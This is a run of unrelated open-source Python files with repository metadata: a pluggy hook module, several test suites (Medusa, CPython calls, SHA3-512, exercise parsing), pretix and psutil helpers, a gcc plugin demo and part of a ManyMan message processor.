),
migrations.AlterField(
model_name='dataacademyabstractevent',
name='time_from',
field=models.TimeField(null=True, verbose_name='Start time'),
),
migrations.AlterField(
model_name='dataacademyabstractevent',
name='time_to',
field=models.TimeField(null=True, verbose_name='End time'),
),
]
| CT-Data-Collaborative/ctdata-wagtail-cms | ctdata/migrations/0039_auto_20161123_1818.py | Python | mit | 1,100 |
"""
Internal hook annotation, representation and calling machinery.
"""
import inspect
import sys
import warnings
class HookspecMarker:
""" Decorator helper class for marking functions as hook specifications.
You can instantiate it with a project_name to get a decorator.
Calling :py:meth:`.PluginManager.add_hookspecs` later will discover all marked functions
if the :py:class:`.PluginManager` uses the same project_name.
"""
def __init__(self, project_name):
self.project_name = project_name
def __call__(
self, function=None, firstresult=False, historic=False, warn_on_impl=None
):
""" if passed a function, directly sets attributes on the function
which will make it discoverable to :py:meth:`.PluginManager.add_hookspecs`.
If passed no function, returns a decorator which can be applied to a function
later using the attributes supplied.
If ``firstresult`` is ``True`` the 1:N hook call (N being the number of registered
hook implementation functions) will stop at I<=N when the I'th function
returns a non-``None`` result.
If ``historic`` is ``True`` calls to a hook will be memorized and replayed
on later registered plugins.
"""
def setattr_hookspec_opts(func):
if historic and firstresult:
raise ValueError("cannot have a historic firstresult hook")
setattr(
func,
self.project_name + "_spec",
dict(
firstresult=firstresult,
historic=historic,
warn_on_impl=warn_on_impl,
),
)
return func
if function is not None:
return setattr_hookspec_opts(function)
else:
return setattr_hookspec_opts
class HookimplMarker:
""" Decorator helper class for marking functions as hook implementations.
You can instantiate with a ``project_name`` to get a decorator.
Calling :py:meth:`.PluginManager.register` later will discover all marked functions
if the :py:class:`.PluginManager` uses the same project_name.
"""
def __init__(self, project_name):
self.project_name = project_name
def __call__(
self,
function=None,
hookwrapper=False,
optionalhook=False,
tryfirst=False,
trylast=False,
specname=None,
):
""" if passed a function, directly sets attributes on the function
which will make it discoverable to :py:meth:`.PluginManager.register`.
If passed no function, returns a decorator which can be applied to a
function later using the attributes supplied.
If ``optionalhook`` is ``True`` a missing matching hook specification will not result
in an error (by default it is an error if no matching spec is found).
If ``tryfirst`` is ``True`` this hook implementation will run as early as possible
in the chain of N hook implementations for a specification.
If ``trylast`` is ``True`` this hook implementation will run as late as possible
in the chain of N hook implementations.
        If ``hookwrapper`` is ``True`` the hook implementation needs to execute exactly
        one ``yield``. The code before the ``yield`` is run early, before any non-hookwrapper
        function is run. The code after the ``yield`` is run after all non-hookwrapper
        functions have run. The ``yield`` receives a :py:class:`.callers._Result` object
representing the exception or result outcome of the inner calls (including other
hookwrapper calls).
If ``specname`` is provided, it will be used instead of the function name when
matching this hook implementation to a hook specification during registration.
"""
def setattr_hookimpl_opts(func):
setattr(
func,
self.project_name + "_impl",
dict(
hookwrapper=hookwrapper,
optionalhook=optionalhook,
tryfirst=tryfirst,
trylast=trylast,
specname=specname,
),
)
return func
if function is None:
return setattr_hookimpl_opts
else:
return setattr_hookimpl_opts(function)
def normalize_hookimpl_opts(opts):
opts.setdefault("tryfirst", False)
opts.setdefault("trylast", False)
opts.setdefault("hookwrapper", False)
opts.setdefault("optionalhook", False)
opts.setdefault("specname", None)
_PYPY = hasattr(sys, "pypy_version_info")
def varnames(func):
"""Return tuple of positional and keywrord argument names for a function,
method, class or callable.
In case of a class, its ``__init__`` method is considered.
For methods the ``self`` parameter is not included.
"""
if inspect.isclass(func):
try:
func = func.__init__
except AttributeError:
return (), ()
elif not inspect.isroutine(func): # callable object?
try:
func = getattr(func, "__call__", func)
except Exception:
return (), ()
try: # func MUST be a function or method here or we won't parse any args
spec = inspect.getfullargspec(func)
except TypeError:
return (), ()
args, defaults = tuple(spec.args), spec.defaults
if defaults:
index = -len(defaults)
args, kwargs = args[:index], tuple(args[index:])
else:
kwargs = ()
# strip any implicit instance arg
# pypy3 uses "obj" instead of "self" for default dunder methods
implicit_names = ("self",) if not _PYPY else ("self", "obj")
if args:
if inspect.ismethod(func) or (
"." in getattr(func, "__qualname__", ()) and args[0] in implicit_names
):
args = args[1:]
return args, kwargs
class _HookRelay:
""" hook holder object for performing 1:N hook calls where N is the number
of registered plugins.
"""
class _HookCaller:
def __init__(self, name, hook_execute, specmodule_or_class=None, spec_opts=None):
self.name = name
self._wrappers = []
self._nonwrappers = []
self._hookexec = hook_execute
self._call_history = None
self.spec = None
if specmodule_or_class is not None:
assert spec_opts is not None
self.set_specification(specmodule_or_class, spec_opts)
def has_spec(self):
return self.spec is not None
def set_specification(self, specmodule_or_class, spec_opts):
assert not self.has_spec()
self.spec = HookSpec(specmodule_or_class, self.name, spec_opts)
if spec_opts.get("historic"):
self._call_history = []
def is_historic(self):
return self._call_history is not None
def _remove_plugin(self, plugin):
def remove(wrappers):
for i, method in enumerate(wrappers):
if method.plugin == plugin:
del wrappers[i]
return True
if remove(self._wrappers) is None:
if remove(self._nonwrappers) is None:
raise ValueError(f"plugin {plugin!r} not found")
def get_hookimpls(self):
# Order is important for _hookexec
return self._nonwrappers + self._wrappers
def _add_hookimpl(self, hookimpl):
"""Add an implementation to the callback chain.
"""
if hookimpl.hookwrapper:
methods = self._wrappers
else:
methods = self._nonwrappers
if hookimpl.trylast:
methods.insert(0, hookimpl)
elif hookimpl.tryfirst:
methods.append(hookimpl)
else:
# find last non-tryfirst method
i = len(methods) - 1
while i >= 0 and methods[i].tryfirst:
i -= 1
methods.insert(i + 1, hookimpl)
def __repr__(self):
return f"<_HookCaller {self.name!r}>"
def __call__(self, *args, **kwargs):
if args:
raise TypeError("hook calling supports only keyword arguments")
assert not self.is_historic()
# This is written to avoid expensive operations when not needed.
if self.spec:
for argname in self.spec.argnames:
if argname not in kwargs:
notincall = tuple(set(self.spec.argnames) - kwargs.keys())
warnings.warn(
"Argument(s) {} which are declared in the hookspec "
"can not be found in this hook call".format(notincall),
stacklevel=2,
)
break
firstresult = self.spec.opts.get("firstresult")
else:
firstresult = False
return self._hookexec(self.name, self.get_hookimpls(), kwargs, firstresult)
def call_historic(self, result_callback=None, kwargs=None):
"""Call the hook with given ``kwargs`` for all registered plugins and
for all plugins which will be registered afterwards.
        If ``result_callback`` is not ``None`` it will be called for each
non-``None`` result obtained from a hook implementation.
"""
self._call_history.append((kwargs or {}, result_callback))
# Historizing hooks don't return results.
# Remember firstresult isn't compatible with historic.
res = self._hookexec(self.name, self.get_hookimpls(), kwargs, False)
if result_callback is None:
return
for x in res or []:
result_callback(x)
def call_extra(self, methods, kwargs):
""" Call the hook with some additional temporarily participating
methods using the specified ``kwargs`` as call parameters. """
old = list(self._nonwrappers), list(self._wrappers)
for method in methods:
opts = dict(hookwrapper=False, trylast=False, tryfirst=False)
hookimpl = HookImpl(None, "<temp>", method, opts)
self._add_hookimpl(hookimpl)
try:
return self(**kwargs)
finally:
self._nonwrappers, self._wrappers = old
def _maybe_apply_history(self, method):
"""Apply call history to a new hookimpl if it is marked as historic.
"""
if self.is_historic():
for kwargs, result_callback in self._call_history:
res = self._hookexec(self.name, [method], kwargs, False)
if res and result_callback is not None:
result_callback(res[0])
class HookImpl:
def __init__(self, plugin, plugin_name, function, hook_impl_opts):
self.function = function
self.argnames, self.kwargnames = varnames(self.function)
self.plugin = plugin
self.opts = hook_impl_opts
self.plugin_name = plugin_name
self.__dict__.update(hook_impl_opts)
def __repr__(self):
return f"<HookImpl plugin_name={self.plugin_name!r}, plugin={self.plugin!r}>"
class HookSpec:
def __init__(self, namespace, name, opts):
self.namespace = namespace
self.function = function = getattr(namespace, name)
self.name = name
self.argnames, self.kwargnames = varnames(function)
self.opts = opts
self.warn_on_impl = opts.get("warn_on_impl")
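# --- Editor's note: illustrative sketch, not part of the original module. ---
# How a host project typically uses the markers above; "myproject" and the
# example classes are made-up names, and wiring into a PluginManager happens
# elsewhere.
hookspec = HookspecMarker("myproject")
hookimpl = HookimplMarker("myproject")


class _ExampleSpec:
    @hookspec(firstresult=True)
    def calculate(self, a, b):
        """Specification: return a result computed from a and b."""


class _ExamplePlugin:
    @hookimpl(tryfirst=True)
    def calculate(self, a, b):
        # matched to _ExampleSpec.calculate by name during registration
        return a + b


# varnames() strips the implicit "self" argument:
# varnames(_ExamplePlugin.calculate) == (("a", "b"), ())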
| RonnyPfannschmidt/pluggy | src/pluggy/_hooks.py | Python | mit | 11,521 |
mystring="40523116"
mystring=mystring +" test"
print(mystring)
| s40523116/2016fallcp_hw | w4.py | Python | agpl-3.0 | 66 |
# coding=utf-8
"""Tests for medusa/post_processor.py."""
from medusa.common import Quality
from medusa.name_parser.parser import NameParser
from medusa.post_processor import PostProcessor
import pytest
@pytest.mark.parametrize('p', [
{ # Test file in PP folder root
'file_path': '/media/postprocess/Show.Name.S01E01.1080p.HDTV.X264-DIMENSION.mkv',
'nzb_name': None,
'expected': {
'show': 'Show Name',
'season': 1,
'episodes': [1],
'quality': Quality.FULLHDTV,
'version': -1
}
},
{ # Test NZB Season pack
'file_path': '/media/postprocess/Show.Name.S02.Season.2.1080p.BluRay.x264-PublicHD/show.name.s02e10.1080p.bluray.x264-rovers.mkv',
'nzb_name': 'Show.Name.S02.Season.2.1080p.BluRay.x264-PublicHD',
'expected': {
'show': 'show name',
'season': 2,
'episodes': [10],
'quality': Quality.FULLHDBLURAY,
'version': -1
}
},
{ # Test NZB single episode
'file_path': '/media/postprocess/Show.Name.S03E13.1080p.HDTV.X264-DIMENSION/Show.Name.S03E13.1080p.HDTV.X264-DIMENSION.mkv',
'nzb_name': 'Show.Name.S03E13.1080p.HDTV.X264-DIMENSION',
'expected': {
'show': 'Show Name',
'season': 3,
'episodes': [13],
'quality': Quality.FULLHDTV,
'version': -1
}
},
{ # Test NZB single episode but random char name
'file_path': '/media/postprocess/Show.Name.S12E02.The.Brain.In.The.Bot.1080p.WEB-DL.DD5.1.H.264-R2D2/161219_06.mkv',
'nzb_name': 'Show.Name.S12E02.The.Brain.In.The.Bot.1080p.WEB-DL.DD5.1.H.264-R2D2',
'expected': {
'show': 'Show Name',
'season': 12,
'episodes': [2],
'quality': Quality.FULLHDWEBDL,
'version': -1
}
},
{ # Test NZB multi episode
'file_path': '/media/postprocess/Show.Name.S03E01E02.HDTV.x264-LOL/Show.Name.S03E01E02.HDTV.x264-LOL.mkv',
'nzb_name': 'Show.Name.S03E01E02.HDTV.x264-LOL',
'expected': {
'show': 'Show Name',
'season': 3,
'episodes': [1, 2],
'quality': Quality.SDTV,
'version': -1
}
},
])
def test_parse_info(p, monkeypatch, parse_method):
"""Run the test."""
# Given
monkeypatch.setattr(NameParser, 'parse', parse_method)
sut = PostProcessor(file_path=p['file_path'], nzb_name=p['nzb_name'])
# When
show, season, episodes, quality, version, airdate = sut._parse_info()
# Then
assert show is not None
assert p['expected'] == {
'show': show.name,
'season': season,
'episodes': episodes,
'quality': quality,
'version': version,
}
| fernandog/Medusa | tests/test_postprocessor_parse_info.py | Python | gpl-3.0 | 2,836 |
import unittest
from test import test_support
# The test cases here cover several paths through the function calling
# code. They depend on the METH_XXX flag that is used to define a C
# function, which can't be verified from Python. If the METH_XXX decl
# for a C function changes, these tests may not cover the right paths.
class CFunctionCalls(unittest.TestCase):
def test_varargs0(self):
self.assertRaises(TypeError, {}.has_key)
def test_varargs1(self):
with test_support._check_py3k_warnings():
{}.has_key(0)
def test_varargs2(self):
self.assertRaises(TypeError, {}.has_key, 0, 1)
def test_varargs0_ext(self):
try:
{}.has_key(*())
except TypeError:
pass
def test_varargs1_ext(self):
with test_support._check_py3k_warnings():
{}.has_key(*(0,))
def test_varargs2_ext(self):
try:
with test_support._check_py3k_warnings():
{}.has_key(*(1, 2))
except TypeError:
pass
else:
raise RuntimeError
def test_varargs0_kw(self):
self.assertRaises(TypeError, {}.has_key, x=2)
def test_varargs1_kw(self):
self.assertRaises(TypeError, {}.has_key, x=2)
def test_varargs2_kw(self):
self.assertRaises(TypeError, {}.has_key, x=2, y=2)
def test_oldargs0_0(self):
{}.keys()
def test_oldargs0_1(self):
self.assertRaises(TypeError, {}.keys, 0)
def test_oldargs0_2(self):
self.assertRaises(TypeError, {}.keys, 0, 1)
def test_oldargs0_0_ext(self):
{}.keys(*())
def test_oldargs0_1_ext(self):
try:
{}.keys(*(0,))
except TypeError:
pass
else:
raise RuntimeError
def test_oldargs0_2_ext(self):
try:
{}.keys(*(1, 2))
except TypeError:
pass
else:
raise RuntimeError
def test_oldargs0_0_kw(self):
try:
{}.keys(x=2)
except TypeError:
pass
else:
raise RuntimeError
def test_oldargs0_1_kw(self):
self.assertRaises(TypeError, {}.keys, x=2)
def test_oldargs0_2_kw(self):
self.assertRaises(TypeError, {}.keys, x=2, y=2)
def test_oldargs1_0(self):
self.assertRaises(TypeError, [].count)
def test_oldargs1_1(self):
[].count(1)
def test_oldargs1_2(self):
self.assertRaises(TypeError, [].count, 1, 2)
def test_oldargs1_0_ext(self):
try:
[].count(*())
except TypeError:
pass
else:
raise RuntimeError
def test_oldargs1_1_ext(self):
[].count(*(1,))
def test_oldargs1_2_ext(self):
try:
[].count(*(1, 2))
except TypeError:
pass
else:
raise RuntimeError
def test_oldargs1_0_kw(self):
self.assertRaises(TypeError, [].count, x=2)
def test_oldargs1_1_kw(self):
self.assertRaises(TypeError, [].count, {}, x=2)
def test_oldargs1_2_kw(self):
self.assertRaises(TypeError, [].count, x=2, y=2)
def test_main():
test_support.run_unittest(CFunctionCalls)
if __name__ == "__main__":
test_main()
| mancoast/CPythonPyc_test | cpython/266_test_call.py | Python | gpl-3.0 | 3,290 |
from crank.core.exercise import Exercise
TEST_EXERCISE_LINES = [
'Swing, KB: 28 x 35',
'Squat: 20, 60 x 5, 80, 90 x 3, 91, 105 x 5, 119 x 4',
'- unit: kg',
'- coming off drill weekend, tired and small',
'Curl, ring: 10/5',
'Plate pinch: 15 x 35/30'
]
TEST_EXERCISE_V2_LINES = [
'Swing, KB:',
' 1) 28 x 35',
'- units: kgs x reps',
'Squat:',
'- unit: kg',
'- coming off drill weekend, tired and small',
' 2) 20 x 5',
' 3) [30] 60 x 5',
' 4) 80 x 3',
' 5) [30] 90 x 3',
' 6) 91 x 5',
' 7) 105 x 5',
' 8) [300] 119 x 4',
'Curl, ring:',
'- units: lbs x reps',
' 9) 10',
' 10) [30] 5',
'Plate pinch: ',
'- unit: kgs x seconds',
' 11) 15 x 35',
' 12) [60] 15 x 30'
]
TEST_SQUAT_LINES = TEST_EXERCISE_V2_LINES[3:13]
TEST_SQUAT_V2_JSON = {
'name': 'Squat',
'tags': {
'unit': 'kg',
'comment': 'coming off drill weekend, tired and small',
},
'sets': [
{'work': 20, 'reps': 5, 'order': 2},
{'work': 60, 'reps': 5, 'order': 3, 'rest': 30},
{'work': 80, 'reps': 3, 'order': 4},
{'work': 90, 'reps': 3, 'order': 5, 'rest': 30},
{'work': 91, 'reps': 5, 'order': 6},
{'work': 105, 'reps': 5, 'order': 7},
{'work': 119, 'reps': 4, 'order': 8, 'rest': 300},
],
}
TEST_EXERCISE = Exercise.from_json(TEST_SQUAT_V2_JSON)
def test_exercise_parsing():
ex, _ = Exercise.parse(TEST_SQUAT_LINES)
assert ex == TEST_EXERCISE
def test_to_json():
d = TEST_EXERCISE.to_json()
assert 'name' in d
assert 'tags' in d
assert 'sets' in d
assert 'raw_sets' not in d
def test_from_json():
ex = Exercise.from_json(TEST_SQUAT_V2_JSON)
assert ex.name == TEST_EXERCISE.name
assert ex.tags == TEST_EXERCISE.tags
assert ex.raw_sets == TEST_EXERCISE.raw_sets
assert ex.sets == TEST_EXERCISE.sets
def test_encoding():
assert TEST_EXERCISE.to_json() == TEST_SQUAT_V2_JSON
def test_parsing_exercise_lines():
exs = Exercise.parse_exercises(TEST_EXERCISE_LINES)
assert len(exs) == 4
| jad-b/Crank | crank/core/tests/test_exercise.py | Python | mit | 2,120 |
from django.core.urlresolvers import resolve
from django.dispatch import receiver
from django.template import Context
from django.template.loader import get_template
from pretix.base.signals import register_payment_providers
from pretix.presale.signals import html_head
@receiver(register_payment_providers)
def register_payment_provider(sender, **kwargs):
from .payment import Stripe
return Stripe
@receiver(html_head)
def html_head_presale(sender, request=None, **kwargs):
from .payment import Stripe
provider = Stripe(sender)
url = resolve(request.path_info)
if provider.is_enabled and ("checkout.payment" in url.url_name or "order.pay" in url.url_name):
template = get_template('pretixplugins/stripe/presale_head.html')
ctx = Context({'event': sender, 'settings': provider.settings})
return template.render(ctx)
else:
return ""
| lab2112/pretix | src/pretix/plugins/stripe/signals.py | Python | apache-2.0 | 899 |
import psutil
_mb_conversion = 1024 * 1024
def cpu_times(*args, **kwargs):
return psutil.cpu_times()
def cpu_count(logical=True, *args, **kwargs):
cores = psutil.cpu_count(logical)
if cores == 1:
word = 'Core'
else:
word = 'Cores'
return '{} CPU {}'.format(cores, word)
def cpu_frequency(*args, **kwargs):
freq = psutil.cpu_freq()
if freq is None:
return ('CPU frequency file moved or not present. See: '
'https://stackoverflow.com/questions/42979943/python3-psutils')
return [x.max for x in freq]
def virtual_memory_percent(*arg, **kwargs):
percent = psutil.virtual_memory().percent
return '{}%'.format(percent)
def virtual_memory_total(*args, **kwargs):
total = int(psutil.virtual_memory().total / _mb_conversion)
return '{} Mb'.format(total)
def virtual_memory_used(*args, **kwargs):
used = int(psutil.virtual_memory().used / _mb_conversion)
return '{} Mb'.format(used)
def swap(*args, **kwargs):
swap = psutil.swap_memory()
used = swap.used
total = swap.total
used = int(used/_mb_conversion)
total = int(total/_mb_conversion)
return 'Used: {} | Total: {}'.format(used, total)
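# Editor's note: a small usage sketch, not part of the original module; the
# helpers above are plain callables, so they can be exercised directly.
if __name__ == '__main__':
    print(cpu_count())               # e.g. "4 CPU Cores"
    print(virtual_memory_percent())  # e.g. "42.0%"
    print(virtual_memory_used(), '/', virtual_memory_total())
    print(swap())                    # e.g. "Used: 512 | Total: 2048" (in Mb)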
| benhoff/vexbot | vexbot/extensions/system.py | Python | gpl-3.0 | 1,216 |
# -*- coding: utf-8 -*-
#
# SelfTest/Hash/test_SHA3_512.py: Self-test for the SHA-3/512 hash function
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Self-test suite for Cryptodome.Hash.SHA3_512"""
import unittest
from binascii import hexlify
from Cryptodome.SelfTest.loader import load_tests
from Cryptodome.SelfTest.st_common import list_test_cases
from StringIO import StringIO
from Cryptodome.Hash import SHA3_512 as SHA3
from Cryptodome.Util.py3compat import b
class APITest(unittest.TestCase):
def test_update_after_digest(self):
msg=b("rrrrttt")
# Normally, update() cannot be done after digest()
h = SHA3.new(data=msg[:4])
dig1 = h.digest()
self.assertRaises(TypeError, h.update, msg[4:])
dig2 = SHA3.new(data=msg).digest()
# With the proper flag, it is allowed
h = SHA3.new(data=msg[:4], update_after_digest=True)
self.assertEquals(h.digest(), dig1)
# ... and the subsequent digest applies to the entire message
# up to that point
h.update(msg[4:])
self.assertEquals(h.digest(), dig2)
def get_tests(config={}):
from common import make_hash_tests
tests = []
test_vectors = load_tests(("Cryptodome", "SelfTest", "Hash", "test_vectors", "SHA3"),
"ShortMsgKAT_SHA3-512.txt",
"KAT SHA-3 512",
{ "len" : lambda x: int(x) } )
test_data = []
for tv in test_vectors:
if tv.len == 0:
tv.msg = b("")
test_data.append((hexlify(tv.md), tv.msg, tv.desc))
tests += make_hash_tests(SHA3, "SHA3_512", test_data,
digest_size=SHA3.digest_size,
oid="2.16.840.1.101.3.4.2.10")
tests += list_test_cases(APITest)
return tests
if __name__ == '__main__':
import unittest
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
| chronicwaffle/PokemonGo-DesktopMap | app/pylibs/win32/Cryptodome/SelfTest/Hash/test_SHA3_512.py | Python | mit | 2,984 |
# Copyright 2011 David Malcolm <dmalcolm@redhat.com>
# Copyright 2011 Red Hat, Inc.
#
# This is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see
# <http://www.gnu.org/licenses/>.
# Sample python script, to be run by our gcc plugin (see "make test")
#print "hello world"
import gcc
import sys
print('sys.version: %s' % sys.version)
#print 'sys.path:', sys.path
#help(gcc)
print(help(gcc.AddrExpr))
print(gcc.Type)
print(gcc.Type.char)
print(help(gcc.Type))
from gccutils import get_src_for_loc, cfg_to_dot, invoke_dot
def my_pass_execution_callback(*args, **kwargs):
print('my_pass_execution_callback was called: args=%r kwargs=%r' % (args, kwargs))
print('gcc.get_translation_units(): %s' % gcc.get_translation_units())
for u in gcc.get_translation_units():
print('u: %s %r' % (u, u))
u.debug()
print('u.block: %s' % u.block)
#help(args[0])
(optpass, fun) = args
print('optpass: %r' % optpass)
print('dir(optpass): %r' % dir(optpass))
print('optpass.name: %r' % optpass.name)
print('fun: %r' % fun)
if fun:
print('fun.cfg: %r' % fun.cfg)
if fun.cfg:
#print help(fun.cfg)
print('fun.cfg.basic_blocks: %r' % fun.cfg.basic_blocks)
print('fun.cfg.entry: %r' % fun.cfg.entry)
print('fun.cfg.exit: %r' % fun.cfg.exit)
print('fun.cfg.entry.succs: %r' % fun.cfg.entry.succs)
print('fun.cfg.exit.preds: %r' % fun.cfg.exit.preds)
dot = cfg_to_dot(fun.cfg)
print(dot)
invoke_dot(dot)
for bb in fun.cfg.basic_blocks:
print('bb: %r' % bb)
print('bb.gimple: %r' % bb.gimple)
if isinstance(bb.gimple, list):
for stmt in bb.gimple:
print(' %r: %r : %s column: %i block: %r' % (stmt, repr(str(stmt)), stmt.loc, stmt.loc.column, stmt.block))
print(get_src_for_loc(stmt.loc))
print(' ' * (stmt.loc.column-1) + '^')
if hasattr(stmt, 'loc'):
print(' stmt.loc: %r' % stmt.loc)
if hasattr(stmt, 'lhs'):
print(' stmt.lhs: %r' % stmt.lhs)
if hasattr(stmt, 'exprtype'):
print(' stmt.exprtype: %r' % stmt.exprtype)
if hasattr(stmt, 'exprcode'):
print(' stmt.exprcode: %r' % stmt.exprcode)
if hasattr(stmt, 'fn'):
print(' stmt.fn: %r %s' % (stmt.fn, stmt.fn))
if hasattr(stmt, 'retval'):
print(' stmt.retval: %r' % stmt.retval)
if hasattr(stmt, 'rhs'):
print(' stmt.rhs: %r' % stmt.rhs)
def my_pre_genericize_callback(*args, **kwargs):
print('my_pre_genericize_callback was called: args=%r kwargs=%r' % (args, kwargs))
#help(args[0])
t = args[0]
print(t)
print(dir(t))
print(type(t))
print(repr(t))
print(str(t))
#print(help(t))
print('t.name: %r' % t.name)
print('t.addr: %s' % hex(t.addr))
print('t.type: %r' % t.type)
print('t.function: %r' % t.function)
#print(help(t.function))
print('t.type.type: %r' % t.type.type)
loc = t.location
print(loc)
print(dir(loc))
print(type(loc))
print(repr(loc))
#print(help(loc))
print('loc.file: %r' % loc.file)
print('loc.line: %r' % loc.line)
# raise RuntimeError('what happens if we get an error here?')
gcc.register_callback(gcc.PLUGIN_PASS_EXECUTION,
my_pass_execution_callback)
gcc.register_callback(gcc.PLUGIN_PRE_GENERICIZE,
my_pre_genericize_callback)
# Try some insane values:
#gcc.register_callback(-1, my_callback)
# Stupid hack idea: a UI for gcc:
#import gtk
#w = gtk.Window(gtk.WINDOW_TOPLEVEL)
#w.show()
#gtk.main()
#from pprint import pprint
#pprint(tree.subclass_for_code)
| jasonxmueller/gcc-python-plugin | test.py | Python | gpl-3.0 | 4,676 |
"""
ManyMan - A Many-core Visualization and Management System
Copyright (C) 2012
University of Amsterdam - Computer Systems Architecture
Jimi van der Woning and Roy Bakker
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from kivy.logger import Logger
import json
# List of valid message types.
known_msg_types = (
'server_init',
'status',
'task_output',
'sim_data',
'selection_set',
'invalid_message'
)
class InvalidMessage(Exception):
"""Define the InvalidMessage exception. Only for naming conventions."""
pass
class MessageProcessor:
"""Processor for all messages that arrive in ManyMan's front-end."""
def __init__(self, comm):
self.comm = comm
def process(self, msg):
"""Process the given message 'msg'."""
try:
data = json.loads(msg)
#print(data)
if not data['type'] in known_msg_types:
raise InvalidMessage('Unknown message type: %s' % data['type'])
elif not self.comm.initialized and data['type'] != 'server_init':
raise InvalidMessage(
'Did not receive initialization message first.'
)
elif self.comm.manyman.started or not self.comm.initialized:
getattr(self, "process_" + data['type'])(data['content'])
except Exception, e:
import traceback
Logger.error(
'MsgProcessor: Received invalid message:\n - %s\n - %s\n' \
' - %s\n - %s' % (e, type(e), msg, traceback.format_exc())
)
# EDITED!
def process_server_init(self, msg):
"""Process the server_init message."""
self.comm.manyman.chip_name = msg['name']
self.comm.manyman.chip_cores = msg['cores']
self.comm.manyman.sample_vars = msg['sample_vars']
self.comm.manyman.current_vars = msg['default_vars']
if 'orientation' in msg:
self.comm.manyman.chip_orientation = msg['orientation']
Logger.info("MsgProcessor: Initialized %s, a %d-core chip" %
(msg['name'], msg['cores']))
self.comm.initialized = True
def process_status(self, msg):
"""Process a status message."""
mm = self.comm.manyman
total_load = 0
# Update the loads of the cores
for i in mm.cores.keys():
core = mm.cores[i]
load = msg['chip']['Cores'][i]['CPU'] / 100.0
core.update_load(load)
total_load += load
mem = msg['chip']['Cores'][i]['MEM'] / 100.0
core.update_mem(mem)
core.frequency = msg['chip']['Cores'][i]['Frequency']
core.voltage = msg['chip']['Cores'][i]['Voltage']
task_ids = []
new_count = dict()
# Update all task information
for task in msg['chip']['Tasks']:
if mm.has_task(task['ID']):
t = mm.tasks[task['ID']]
if task["Status"] in ["Finished", "Failed"] and \
not t.status in ["Finished", "Failed"]:
mm.finish_task(task['ID'], task['Status'])
elif not task['Status'] in ["Finished", "Failed"] and \
((not t.core and task['Core'] >= 0) or \
(t.core and t.core.index != task['Core'])):
if task['Core'] < 0:
mm.move_task(t)
else:
mm.move_task(t, mm.cores[task['Core']])
else:
t = mm.add_task(
task['ID'],
task['Name'],
task['Core'],
task['Status']
)
# Count the number of tasks per core
if not task['Status'] in ["Finished", "Failed", "Stopped"]:
if task['Core'] in new_count:
new_count[task['Core']] += 1
else:
new_count[task['Core']] = 1
if t:
task_ids.append(task['ID'])
t.status = task['Status']
if t.core:
t.load_cpu = task['CPU']
t.load_mem = task['MEM']
# Update the number of running tasks per core
for core in range(len(mm.cores)):
count = 0
if core in new_count:
count = new_count[core]
mm.cores[core].pending_count = count
# Remove all stopped tasks from the system
for task in filter(lambda x: x not in task_ids, mm.tasks):
Logger.debug("MsgProcessor: %s no longer running" % task)
mm.remove_task(task)
# Calculate the total load
total_load /= len(mm.cores)
Logger.debug("MsgProcessor: Total load: %.1f%%" % (total_load * 100.))
mm.cpu_load = total_load
mm.cpu_power = msg['chip']['Power']
def process_task_output(self, msg):
"""Process a task_output message."""
if not self.comm.manyman.has_task(msg['id']):
return
t = self.comm.manyman.tasks[msg['id']]
t.set_output(msg['output'])
def process_sim_data(self, msg):
mm = self.comm.manyman
#mm.components_list['cpu0'].update_load(0.5)
mm.previous_kernel_cycle = mm.current_kernel_cycle
mm.current_kernel_cycle = msg['data']['kernel.cycle']
delay = msg['status']['delay']
status = msg['status']['sim']
step = msg['status']['step']
if status == 0:
mm.status_label.text = "simulator status\n\npaused"
else:
mm.status_label.text = "simulator status\n\nrunning"
mm.kernel_label.text = "kernel cycle\n\n" + str(mm.current_kernel_cycle)
mm.delay_label.text = "current send delay\n\n" + str(delay)
mm.step_label.text = "current steps\n\n" + str(step)
for k, v in msg['data'].items():
#print k
components = k.split(':')
if components[0] in mm.components_list:
if len(components) < 2:
mm.components_list[components[0]].update_data(components[0], v)
elif len(components) > 2:
mm.components_list[components[0]].update_data(':'.join(components[1:]), v)
else:
mm.components_list[components[0]].update_data(components[1], v)
#print components[0], mm.components_list[components[0]].get_data(components[0])
#if v != 0:
# mm.components_list[components[0]].update_load(0.5)
#print components[0] + ': ' + str(v)
def process_selection_set(self, msg):
mm = self.comm.manyman
mm.sample_vars = msg['sample_vars']
mm.current_vars = mm.current_vars2
mm.layout.remove_widget(mm.rightbar)
mm.layout.remove_widget(mm.core_grid)
mm.init_core_grid()
mm.layout.add_widget(mm.rightbar)
mm.comm.selection_send()
def process_invalid_message(self, msg):
"""Process an invalid_message message."""
Logger.warning(
"MsgProcessor: Sent an invalid message to the server:\n %s" % \
msg['message']
)
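# Editor's note: illustrative sketch of the wire format process() expects,
# derived from the handlers above; all field values below are made up.
#
#   {"type": "server_init",
#    "content": {"name": "demo-chip", "cores": 4,
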